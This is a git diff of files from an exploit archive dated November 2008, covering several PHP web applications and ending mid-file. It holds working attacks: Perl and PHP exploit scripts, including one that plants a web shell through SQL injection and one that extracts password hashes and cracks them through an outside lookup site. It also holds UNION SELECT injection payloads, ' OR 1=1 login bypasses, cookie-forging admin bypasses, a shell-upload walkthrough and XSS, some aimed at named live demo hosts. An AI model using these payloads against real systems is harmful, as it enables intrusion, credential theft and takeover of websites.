$dat = <$socket>; - } - close $socket; - return $dat; - } -} - -sub usage { - print "\n\tUsage:\t$0 http://site.com [-b|full server path] - - By default exlpoit checks /lang/english.php for errors to get real path, - If path could not be found exploit will bruteforce it ( or if used -b or none path is specified ). - - Example:\t$0 http://localhost/ /var/www/htdocs - $0 http://localhost/ -b - $0 http://localhost/\n\n"; - exit; -} - -# milw0rm.com [2008-11-13] +#!/usr/bin/perl + +=about + + MemHT 4.0.1 Perl exploit + + AUTHOR + discovered & written by Ams + ax330d [doggy] gmail [dot] com + + VULN. DESCRIPTION: + Due to weak params filtering we are able to make + SQL-Injection. So, + 1. Look at 'inc/ajax/ajax_rating.php', line ~ 29. 
+ It is not enough to check whether script has been accessed from + main file. Better define some value. + 2. 'inc/inc_login.php' line ~ 35. Here we are able to send and + bypass any IP. That eregi does not help, look at exploit in injection, + comma is the last one. + + As proof this exploit creates simple shell. + + REQUIREMENTS: + MySQL should be able to write to file + Know full server path to portal + +=cut + +use strict; +use warnings; +use IO::Socket; + +print " + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + MemHT portal 4.0.1 Perl exploit + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + "; + +my $expl_url = shift or &usage; +my $serv_path = shift || '-b'; +my $def_shell = '/uploads/file/files.php'; +# Simple concept shell +my $shell = 'new( + Proto => 'tcp', + PeerAddr => $host, + PeerPort => 80 + ); + if( ! $socket) { + return 0; + } else { + + print $socket $packet; + if( $ret ) { + local $/; + $dat = <$socket>; + } + close $socket; + return $dat; + } +} + +sub usage { + print "\n\tUsage:\t$0 http://site.com [-b|full server path] + + By default exlpoit checks /lang/english.php for errors to get real path, + If path could not be found exploit will bruteforce it ( or if used -b or none path is specified ). + + Example:\t$0 http://localhost/ /var/www/htdocs + $0 http://localhost/ -b + $0 http://localhost/\n\n"; + exit; +} + +# milw0rm.com [2008-11-13] diff --git a/platforms/php/webapps/7116.txt b/platforms/php/webapps/7116.txt index fd33f7f74..8565f1309 100755 --- a/platforms/php/webapps/7116.txt +++ b/platforms/php/webapps/7116.txt 
@@ -1,76 +1,76 @@ -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\ - -============================================================================== - AlstraSoft Web Host Directory v1.2 Multiple Vulnerabilities -============================================================================== - - [»] Script: [ AlstraSoft Web Host Directory v1.2 ] - [»] Language: [ PHP ] - [»] Website: [ http://alstrasoft.com/webhost.htm ] - [»] Type: [ Commercial ] - [»] Report-Date: [ 14.11.2008 ] - [»] Founder: [ G4N0K ] - - -===[ DTLZ ]=== - - [0] Insecure Cookie Handling - - [!] admin Auth bypass, panel => http://localhost/[paht]/admin/ - [»] javascript:document.cookie = "adm=1"; - - [!] users Auth bypass - [»] javascript:document.cookie = "logged=[username]"; - javascript:document.cookie = "logged=g4n0k"; - - - - [1] Arbitrary Database Backup - - [!] we can download a Backup of Database. - [»] http://localhost/[paht]/admin/backup/db - - - - [2] SQLi Auth Bypass - - [»] Username : [a_valid_username] - [»] Password : ' OR ' 1=1-- - - -===[ LIVE ]=== - - [»] http://www.hyperstop.com/demo/webhost/ - username: testtest - password: ' OR ' 1=1-- - - javascript:document.cookie = "logged=testtest"; - - -===[ Greetz ]=== - - [»] ALLAH - [»] Tornado2800 - [»] Hussain-X - - //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) - //ALLAH,forgimme... 
- -=============================================================================== -exit(); -=============================================================================== - -# milw0rm.com [2008-11-14] +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . \ + \____| |_| |_| \_| \___/ |_|\_\ + +============================================================================== + AlstraSoft Web Host Directory v1.2 Multiple Vulnerabilities +============================================================================== + + [»] Script: [ AlstraSoft Web Host Directory v1.2 ] + [»] Language: [ PHP ] + [»] Website: [ http://alstrasoft.com/webhost.htm ] + [»] Type: [ Commercial ] + [»] Report-Date: [ 14.11.2008 ] + [»] Founder: [ G4N0K ] + + +===[ DTLZ ]=== + + [0] Insecure Cookie Handling + + [!] admin Auth bypass, panel => http://localhost/[paht]/admin/ + [»] javascript:document.cookie = "adm=1"; + + [!] users Auth bypass + [»] javascript:document.cookie = "logged=[username]"; + javascript:document.cookie = "logged=g4n0k"; + + + + [1] Arbitrary Database Backup + + [!] we can download a Backup of Database. + [»] http://localhost/[paht]/admin/backup/db + + + + [2] SQLi Auth Bypass + + [»] Username : [a_valid_username] + [»] Password : ' OR ' 1=1-- + + +===[ LIVE ]=== + + [»] http://www.hyperstop.com/demo/webhost/ + username: testtest + password: ' OR ' 1=1-- + + javascript:document.cookie = "logged=testtest"; + + +===[ Greetz ]=== + + [»] ALLAH + [»] Tornado2800 + [»] Hussain-X + + //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. 
[:-)
+ //ALLAH,forgimme...
+
+===============================================================================
+exit();
+===============================================================================
+
+# milw0rm.com [2008-11-14]
diff --git a/platforms/php/webapps/7117.txt b/platforms/php/webapps/7117.txt
index c714945e4..08eb6e001 100755
--- a/platforms/php/webapps/7117.txt
+++ b/platforms/php/webapps/7117.txt
@@ -1,100 +1,100 @@ -[~] GS Real Estate Portal US and International Module -[~] -[~] SQL/BYPASS/RFU/XSS -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 13.11.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] my bug number now: 39 -[~] -[~] my target bug number: 100 -[~] -[~] ----------------------------------------------------------- - - -Exploit 1: sql inj - -http://localhost/script/email.php?AgentID=[SQL] - - -[SQL] - --47+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,database(),0x3a,version()),12,13,14,15,16,17,18,19,20,21,22,23+from+admin-- - - -sql for demo: - -http://hostnomi.net/int/email.php?AgentID=-47+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,database(),0x3a,version()),12,13,14,15,16,17,18,19,20,21,22,23+from+admin-- - - - -Exploit 2: auth bypass - -login: http://localhost/script/login.php - -username: [real_admin_or_user_name] ' or ' 1=1-- - -password: ZoRLu - -note: generally admin name: admin - - -bypass for demo: - -login: http://hostnomi.net/int/login.php - -admin: admin ' or ' 1=1-- - -passwd: ZoRLu - - -exploit 3: Rfu - -you login to site and edit your profile upload your_shell.php - -after right click to your logo and select properties. copy photo link. 
- -paste your explorer go your_shell.php - - -your_shell.php path: - -http://localhost/script/re_images/[id]_logo_your_shell.php - - -rfu for demo: - -user: zorlu - -passwd: zorlu1 - -edit profile: http://hostnomi.net/int/profile.php - -shell: http://hostnomi.net/int/re_images/1226591775_logo_c.php ( no permission this demo server ) - - - -exploit 4: XSS - -http://localhost/script/email.php?AgentID=&ListingID="> - -xss for demo: - -http://hostnomi.net/int/email.php?AgentID=&ListingID="> - - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & all Muslim HaCkeRs -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-11-14] +[~] GS Real Estate Portal US and International Module +[~] +[~] SQL/BYPASS/RFU/XSS +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 13.11.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] my bug number now: 39 +[~] +[~] my target bug number: 100 +[~] +[~] ----------------------------------------------------------- + + +Exploit 1: sql inj + +http://localhost/script/email.php?AgentID=[SQL] + + +[SQL] + +-47+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,database(),0x3a,version()),12,13,14,15,16,17,18,19,20,21,22,23+from+admin-- + + +sql for demo: + +http://hostnomi.net/int/email.php?AgentID=-47+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,database(),0x3a,version()),12,13,14,15,16,17,18,19,20,21,22,23+from+admin-- + + + +Exploit 2: auth bypass + +login: http://localhost/script/login.php + +username: [real_admin_or_user_name] ' or ' 1=1-- + +password: ZoRLu + +note: generally admin name: admin + + +bypass for demo: + +login: http://hostnomi.net/int/login.php + +admin: admin ' or ' 1=1-- + +passwd: ZoRLu + + +exploit 3: Rfu + +you login 
to site and edit your profile upload your_shell.php + +after right click to your logo and select properties. copy photo link. + +paste your explorer go your_shell.php + + +your_shell.php path: + +http://localhost/script/re_images/[id]_logo_your_shell.php + + +rfu for demo: + +user: zorlu + +passwd: zorlu1 + +edit profile: http://hostnomi.net/int/profile.php + +shell: http://hostnomi.net/int/re_images/1226591775_logo_c.php ( no permission this demo server ) + + + +exploit 4: XSS + +http://localhost/script/email.php?AgentID=&ListingID="> + +xss for demo: + +http://hostnomi.net/int/email.php?AgentID=&ListingID="> + + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & all Muslim HaCkeRs +[~] +[~] yildirimordulari.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-11-14] diff --git a/platforms/php/webapps/7118.txt b/platforms/php/webapps/7118.txt index f5a91ac91..5cdaecfd1 100755 --- a/platforms/php/webapps/7118.txt +++ b/platforms/php/webapps/7118.txt 
@@ -1,54 +1,54 @@ -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\ - -============================================================================== - Turnkeyforms Text Link Sales Auth Bypass Vulnerability -============================================================================== - - [»] Script: [ Turnkeyforms Text Link Sales ] - [»] Language: [ PHP ] - [»] Website: [ http://www.turnkeyforms.com/text-link-sales.html ] - [»] Type: [ Commercial ] - [»] Report-Date: [ 13.11.2008 ] - [»] Founder: [ G4N0K ] - - -===[ DTLZ ]=== - - [!] here we go... - [»] http://localhost/[paht]/admin.php - - - -===[ LIVE ]=== - - [»] http://demo.turnkeyforms.com/textlinkads/admin.php - - - -===[ Greetz ]=== - - [»] ALLAH - [»] Tornado2800 - [»] Hussain-X - - //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) - //ALLAH,forgimme... - -=============================================================================== -exit(); -=============================================================================== - -# milw0rm.com [2008-11-14] +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . 
\ + \____| |_| |_| \_| \___/ |_|\_\ + +============================================================================== + Turnkeyforms Text Link Sales Auth Bypass Vulnerability +============================================================================== + + [»] Script: [ Turnkeyforms Text Link Sales ] + [»] Language: [ PHP ] + [»] Website: [ http://www.turnkeyforms.com/text-link-sales.html ] + [»] Type: [ Commercial ] + [»] Report-Date: [ 13.11.2008 ] + [»] Founder: [ G4N0K ] + + +===[ DTLZ ]=== + + [!] here we go... + [»] http://localhost/[paht]/admin.php + + + +===[ LIVE ]=== + + [»] http://demo.turnkeyforms.com/textlinkads/admin.php + + + +===[ Greetz ]=== + + [»] ALLAH + [»] Tornado2800 + [»] Hussain-X + + //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) + //ALLAH,forgimme... + +=============================================================================== +exit(); +=============================================================================== + +# milw0rm.com [2008-11-14] diff --git a/platforms/php/webapps/7119.php b/platforms/php/webapps/7119.php index c534401f9..0ac5d72fd 100755 --- a/platforms/php/webapps/7119.php +++ b/platforms/php/webapps/7119.php 
@@ -1,68 +1,68 @@ -#!/usr/bin/php -\n别告诉我你不会用 -,-\n"); -else - exit("å—¯,大概是该网站不存在漏洞,换一个吧 -,-\n"); - -function send() -{ - global $host, $path, $url, $cmd; - - $data = "POST ".$path."wap/index.php HTTP/1.1\r\n"; - $data .= "Accept: */*\r\n"; - $data .= "Accept-Language: zh-cn\r\n"; - $data .= "Referer: http://$host$path\r\n"; - $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; - $data .= "User-Agent: Opera/9.62 (X11; Linux i686; U; zh-cn) Presto/2.1.1\r\n"; - $data .= "Host: $host\r\n"; - $data .= "Connection: Close\r\n"; - $data .= "Content-Length: ".strlen($cmd)."\r\n\r\n"; - $data .= $cmd; - - $fp = fsockopen($host, 80); - fputs($fp, $data); - - $resp = ''; - - while ($fp && !feof($fp)) - $resp .= fread($fp, 1024); - - return $resp; -} - -?> - -# milw0rm.com [2008-11-14] +#!/usr/bin/php +\n别告诉我你不会用 -,-\n"); +else + exit("å—¯,大概是该网站不存在漏洞,换一个吧 -,-\n"); + +function send() +{ + global $host, $path, $url, $cmd; + + $data = "POST ".$path."wap/index.php HTTP/1.1\r\n"; + $data .= "Accept: */*\r\n"; + $data .= "Accept-Language: zh-cn\r\n"; + $data .= "Referer: http://$host$path\r\n"; + $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; + $data .= "User-Agent: Opera/9.62 (X11; Linux i686; U; zh-cn) Presto/2.1.1\r\n"; + $data .= "Host: $host\r\n"; + $data .= "Connection: Close\r\n"; + $data .= "Content-Length: ".strlen($cmd)."\r\n\r\n"; + $data .= $cmd; + + $fp = fsockopen($host, 80); + fputs($fp, $data); + + $resp = ''; + + while ($fp && !feof($fp)) + $resp .= fread($fp, 1024); + + return $resp; +} + +?> + +# milw0rm.com [2008-11-14] diff --git a/platforms/php/webapps/7121.pl b/platforms/php/webapps/7121.pl index 3be5fc119..17e721a05 100755 --- a/platforms/php/webapps/7121.pl +++ b/platforms/php/webapps/7121.pl 
@@ -1,118 +1,118 @@ -#!/usr/bin/perl - -=starting - - -------------------------------------------------------- - SlimCMS <= 1.0.0 (edit.php) Remote SQL Injection Exploit - -------------------------------------------------------- - by athos - staker[at]hotmail[dot]it - - download on sourceforge - - - File edit.php - - 111. if ($password == md5($_POST['password'])) - 112. { - 113. if (strlen($_POST['cmsText']) > 2) { - 114. $query = "UPDATE pages SET title = '".$_POST['pageTitle']."', content = '". - strip_tags(stripslashes($_POST['cmsText']),$allowedTags)."' WHERE ID = ".$_GET['pageID']; - 115. mysql_query($query); - 116. //$successfulyUpdated - 117. responseText = $successfulyUpdated; - 118. } - 119. - 120. if (strlen($_GET['pageID']) > 0) { - 121. $query = "SELECT * FROM pages WHERE ID = ".$_GET['pageID']; - 122. $result = mysql_query($query); - 123. - 124. - 125. while($row = mysql_fetch_array($result)) { - 126. $pageTitle = $row['title']; - 127. $pageContent = $row['content']; - 128. } - 129. } - - NOTE: Works Regardless PHP.ini Settings! - - - you must be logged.. 
- - Usage: perl "exploit.pl" [HOST] [username:password] [USER_ID] - - Output: Username: athos - Password: 27e43424d53719a645ae7cca038b45be - - - -=cut - -use strict; -use LWP::UserAgent; -use LWP::Simple; - -my $match = q{Editing page "(.+?)"}; -my $http = new LWP::UserAgent; -my $post = undef; -my @login = (); -my @out = (); - -my ($host,$auth,$myid) = @ARGV; - -unless($host =~ /http:\/\/(.+?)$/i && $auth && $myid) -{ - print STDOUT "Usage: perl $0 [host/path] [username:password] [id]\r\n"; - exit; -} - -$host .= "/edit.php?pageID=-1 union select 1,concat(username,0x3a,password),3,4 from users where id=$myid#"; - -@login = split(':',$auth); - -$post = $http->post($host,[ - username => $login[0], - password => $login[1], - ]); - - -if($post->is_success && $post->content =~ $match) -{ - @out = split(':',$1); - - if($#out => 2) - { - my $cracked = search_MD5($out[1]); - - print STDOUT "Username: $out[0]\r\n"; - print STDOUT "Password: $out[1] -> $cracked\r\n"; - exit; - } - else - { - print STDOUT "Exploit Failed!\r\n"; - print STDOUT "Login incorrect or site not vulnerable\\available!\r\n"; - exit; - } -} - - -sub search_MD5 -{ - my $hash = shift @_; - my $cont = undef; - - $cont = get('http://md5.rednoize.com/?p&s=md5&q='.$hash); - - if(length($hash) => 32 && !is_error($cont)) - { - return $cont; - } - else - { - return exit; - } -} - -__END__ - -# milw0rm.com [2008-11-14] +#!/usr/bin/perl + +=starting + + -------------------------------------------------------- + SlimCMS <= 1.0.0 (edit.php) Remote SQL Injection Exploit + -------------------------------------------------------- + by athos - staker[at]hotmail[dot]it + + download on sourceforge + + + File edit.php + + 111. if ($password == md5($_POST['password'])) + 112. { + 113. if (strlen($_POST['cmsText']) > 2) { + 114. $query = "UPDATE pages SET title = '".$_POST['pageTitle']."', content = '". + strip_tags(stripslashes($_POST['cmsText']),$allowedTags)."' WHERE ID = ".$_GET['pageID']; + 115. 
mysql_query($query); + 116. //$successfulyUpdated + 117. responseText = $successfulyUpdated; + 118. } + 119. + 120. if (strlen($_GET['pageID']) > 0) { + 121. $query = "SELECT * FROM pages WHERE ID = ".$_GET['pageID']; + 122. $result = mysql_query($query); + 123. + 124. + 125. while($row = mysql_fetch_array($result)) { + 126. $pageTitle = $row['title']; + 127. $pageContent = $row['content']; + 128. } + 129. } + + NOTE: Works Regardless PHP.ini Settings! + + + you must be logged.. + + Usage: perl "exploit.pl" [HOST] [username:password] [USER_ID] + + Output: Username: athos + Password: 27e43424d53719a645ae7cca038b45be + + + +=cut + +use strict; +use LWP::UserAgent; +use LWP::Simple; + +my $match = q{Editing page "(.+?)"}; +my $http = new LWP::UserAgent; +my $post = undef; +my @login = (); +my @out = (); + +my ($host,$auth,$myid) = @ARGV; + +unless($host =~ /http:\/\/(.+?)$/i && $auth && $myid) +{ + print STDOUT "Usage: perl $0 [host/path] [username:password] [id]\r\n"; + exit; +} + +$host .= "/edit.php?pageID=-1 union select 1,concat(username,0x3a,password),3,4 from users where id=$myid#"; + +@login = split(':',$auth); + +$post = $http->post($host,[ + username => $login[0], + password => $login[1], + ]); + + +if($post->is_success && $post->content =~ $match) +{ + @out = split(':',$1); + + if($#out => 2) + { + my $cracked = search_MD5($out[1]); + + print STDOUT "Username: $out[0]\r\n"; + print STDOUT "Password: $out[1] -> $cracked\r\n"; + exit; + } + else + { + print STDOUT "Exploit Failed!\r\n"; + print STDOUT "Login incorrect or site not vulnerable\\available!\r\n"; + exit; + } +} + + +sub search_MD5 +{ + my $hash = shift @_; + my $cont = undef; + + $cont = get('http://md5.rednoize.com/?p&s=md5&q='.$hash); + + if(length($hash) => 32 && !is_error($cont)) + { + return $cont; + } + else + { + return exit; + } +} + +__END__ + +# milw0rm.com [2008-11-14] diff --git a/platforms/php/webapps/7122.txt b/platforms/php/webapps/7122.txt index 8caa2f169..7f71bc039 100755 
--- a/platforms/php/webapps/7122.txt +++ b/platforms/php/webapps/7122.txt 
@@ -1,60 +1,59 @@ - - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - -<> Found by : Cyb3r-1sT - -<> C0ntact : cyb3r-1st [at] hotmail.com - -<> Groups : InjEctOr5 T3am - -<> site : tryag.cc/cc $&$ hackteach.org/cc - -======================================================= -++++++++++++++++++++ Script information++++++++++++++++++++++ -======================================================= - - -<<->> script : gs-real-estate-portal - -<<->> script site : http://hostnomi.net/detail.php?spid=44 - - - -======================================================= -++++++++++++++++++++++++ Exploit +++++++++++++++++++++++++ -======================================================= - - -<<->> D0rk : find it - -<<->> Exploit :>>> - - >>>> www.site.me/forum/index.php?show_board=99999+union+select+0,0,0,0,0,0,0,0,0,concat(admin_name,0x3a,admin_pass),0,0,0,0,0,0,0+from+tbl_admin/* - -<<->> live demo >>> - - >>>> http://hostnomi.net/int/forum/index.php?show_board=99999+union+select+0,0,0,0,0,0,0,0,0,concat(admin_name,0x3a,admin_pass),0,0,0,0,0,0,0+from+tbl_admin/* - -======================================================= -+++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ -======================================================= - - -all freinds , muslim , and stroke .... 
and for the kids who send the message :) u just kide - -# milw0rm.com [2008-11-14] + || || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + +<> Found by : Cyb3r-1sT + +<> C0ntact : cyb3r-1st [at] hotmail.com + +<> Groups : InjEctOr5 T3am + +<> site : tryag.cc/cc $&$ hackteach.org/cc + +======================================================= +++++++++++++++++++++ Script information++++++++++++++++++++++ +======================================================= + + +<<->> script : gs-real-estate-portal + +<<->> script site : http://hostnomi.net/detail.php?spid=44 + + + +======================================================= +++++++++++++++++++++++++ Exploit +++++++++++++++++++++++++ +======================================================= + + +<<->> D0rk : find it + +<<->> Exploit :>>> + + >>>> www.site.me/forum/index.php?show_board=99999+union+select+0,0,0,0,0,0,0,0,0,concat(admin_name,0x3a,admin_pass),0,0,0,0,0,0,0+from+tbl_admin/* + +<<->> live demo >>> + + >>>> http://hostnomi.net/int/forum/index.php?show_board=99999+union+select+0,0,0,0,0,0,0,0,0,concat(admin_name,0x3a,admin_pass),0,0,0,0,0,0,0+from+tbl_admin/* + +======================================================= ++++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ +======================================================= + + +all freinds , muslim , and stroke .... 
and for the kids who send the message :) u just kide + +# milw0rm.com [2008-11-14] diff --git a/platforms/php/webapps/7123.txt b/platforms/php/webapps/7123.txt index f7fd65ef9..6cd576ff7 100755 --- a/platforms/php/webapps/7123.txt +++ b/platforms/php/webapps/7123.txt 
@@ -1,43 +1,43 @@ -[~] Powered By X7 Chat 2.0.5 auth bypass -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 14.11.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] my bug number now: 42 -[~] -[~] my target bug number: 100 -[~] -[~] ----------------------------------------------------------- - - -Exploit: - -username: ZoRLu or anything write - -password: ' or ' 1=1-- - - -login for demo: - -http://x7chat2demo.hostx7.com/ - -username: ZoRLu - -password: ' or ' 1=1-- - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & all Muslim HaCkeRs -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-11-14] +[~] Powered By X7 Chat 2.0.5 auth bypass +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 14.11.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] my bug number now: 42 +[~] +[~] my target bug number: 100 +[~] +[~] ----------------------------------------------------------- + + +Exploit: + +username: ZoRLu or anything write + +password: ' or ' 1=1-- + + +login for demo: + +http://x7chat2demo.hostx7.com/ + +username: ZoRLu + +password: ' or ' 1=1-- + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & all Muslim HaCkeRs +[~] +[~] yildirimordulari.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-11-14] diff --git a/platforms/php/webapps/7124.txt b/platforms/php/webapps/7124.txt index 3086d00d9..9baae5976 100755 --- a/platforms/php/webapps/7124.txt +++ b/platforms/php/webapps/7124.txt 
@@ -1,47 +1,47 @@ -[~] turnkeyforms Text Link Sales Remote Sql inj & xss -[~] -[~]---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 14.11.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] my bug number now: 43 -[~] -[~] my target bug number: 100 -[~] -[~] ----------------------------------------------------------- - - -Exploit: sql inj - -http://localhost/script/admin.php?a=users&id=[SQL] - - -[SQL] - -999+union+select+1,user(),database(),version(),5,6,7-- - - -sql for demo: - -http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=999+union+select+1,user(),database(),version(),5,6,7-- - - -xss: - -http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id="> - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & all Muslim HaCkeRs -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-11-14] +[~] turnkeyforms Text Link Sales Remote Sql inj & xss +[~] +[~]---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 14.11.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] my bug number now: 43 +[~] +[~] my target bug number: 100 +[~] +[~] ----------------------------------------------------------- + + +Exploit: sql inj + +http://localhost/script/admin.php?a=users&id=[SQL] + + +[SQL] + +999+union+select+1,user(),database(),version(),5,6,7-- + + +sql for demo: + +http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=999+union+select+1,user(),database(),version(),5,6,7-- + + +xss: + +http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id="> + 
+[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & all Muslim HaCkeRs +[~] +[~] yildirimordulari.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-11-14] diff --git a/platforms/php/webapps/7128.txt b/platforms/php/webapps/7128.txt index 127a1a233..ec6936b4a 100755 --- a/platforms/php/webapps/7128.txt +++ b/platforms/php/webapps/7128.txt 
@@ -1,40 +1,40 @@ -================================================================================================================== - SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM - S N N N A A K K E S T E A A M M M M - SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M - S N N N A A K K E S T E A A M M M - SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M -===================================================SNAKES TEAM==================================================== -+ = -= Script: clipShare Remote SQL Injection Vulnerability + -+ = -==============================================:::ALGERIAN HaCkEr:::=============================================== - = = = = - = = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = = - = = - = = ************ ::::::home : www.snakespc.com/sc::::::*************** = = - = = - = = :::::Mail: snakespc@gmail.com::::::: = = - = = - = script:http://www.clip-share.com = - = = - = channel_detail.php?chid= = - =================================== Snakespc ====================================== -D0rk: clipshare/channel_detail.php?chid= -Dork: Powered By SalSa Creations - -Exploit: - 